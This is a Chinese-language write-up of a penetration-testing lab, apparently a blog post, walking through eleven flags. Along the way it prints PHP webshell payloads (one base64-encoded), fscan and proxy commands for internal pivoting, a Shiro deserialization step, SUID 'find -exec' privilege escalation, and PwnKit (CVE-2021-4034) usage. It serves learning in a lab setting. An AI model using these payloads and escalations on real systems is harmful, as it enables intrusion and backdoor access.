一直不知道自己的第一篇文章写什么(主要是懒),正好发现这个渗透测试的wp很少,写一篇wp混一下。
废话不多说,直接开始正题
第一个flag
进来发现是个语言教程的场景,web第一步,f12开启!
第二个flag
果然一眼丁真,他说第二个flag要管理员才能拿,就想着拿一下权限试试
在刚进来的一开始我们就发现了这是个语言教程的场景的靶场,而这种靶场是需要语言运行环境,若权限设置不当,很容易造成rce,于是直接找到我们的老朋友PHP,简单尝试一下,果然可以!
于是乎拿出珍藏已久的payload一打,这两个都是可以的
<?php
fputs(fopen("shell.php","w"),'<?php eval($_POST[123]);?>');
?>
<?php
system("echo PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg== | base64 -d >0vers1eep.php & ls");
?>
拿蚁剑进行连接
也是成功上线,(但是最后发现是我理解错误,他说的管理员权限是登录网站后台,而我误以为是拿到权限)
于是去尝试登录网站后台
直接在url后加admin
账号密码:admin/admin,即可成功登录后台拿取第二个flag
第三个flag
根据提示在根目录,去根目录进行翻找(前面已经拿到权限)
第三个flag get!
第四个flag
根据提示下一个在数据库和root权限下,我们先用哥斯拉尝试连接翻找数据库
用哥斯拉生成一个后门文件,通过蚁剑把后门文件上传到后台,在数据库翻找一下配置文件
找到后配置一下
即找到数据库flag
第五个flag
不大会(有懂的师傅可以教教)
第六个flag
开始我们的内网之旅!
上传fscan扫描一波,用到的语句如下
上传文件fscan_386
chmod 777 fscan_386 //给文件加权限
ifconfig //看ip地址
./fscan_386 -h 192.168.0.2/24 -o 0vers1eep.txt //开扫!并把扫描结果放到一个名为0vers1eep.txt的文件里
成功导出0vers1eep.txt文件,接下来就是开代理上内网
我用的是neoreg和Proxifier代理(此工具使用就不演示了,有问题可私聊我一下)
成功登录内网
我们拿御剑等扫描工具扫一下
成功在robots.txt文件中发现第六个flag
第七个flag
尝试弱口令登录并抓包
结果意外发现rememberMe=deleteMe,可能存在shiro反序列
于是利用利用工具一把梭哈
生成后门尝试连接
连接上去发现第七个flag
第八个flag
我们继续基本思路,尝试提权
先查看确定flag的路径
可见/home
下的flag我们已经获取,就差/root
权限下的flag
我们尝试使用suid提权进行查看flag
find anyfile -exec whoami \; //anyfile:在你所在的目录文件下的任意文件
find anyfile -exec cat /root/flag \;
成功提权
查看flag
成功获取flag
第九个flag
根据基本思路(普通用户—>后台用户—>数据库—>root提权),上个站的flag也基本拿完了,于是我们换下一个站继续
直接上尚方宝剑
蚁剑连接后直接拿下flag
第十个flag
依旧是换汤不换药
哥斯拉连接数据库,查看flag
成功拿下,根据提示继续拿root权限
第十一个flag
得拿下root权限,这里需要用到CVE-2021-4034
上传payload文件后
chmod 777 PwnKit //加权限
./PwnKit 'cat /root/flag' //查看flag
即可得到最后一个flag
到这里,一次愉快的靶场渗透之旅就结束了!!!
总结
要形成一个渗透的基本思路:简单来说就是,想尽办法从低权限到高权限。
不要局限与一种方法,尝试多种方法来达到自己的想要的结果。
多尝试,多动手,多思考。
读万卷书,行万里路!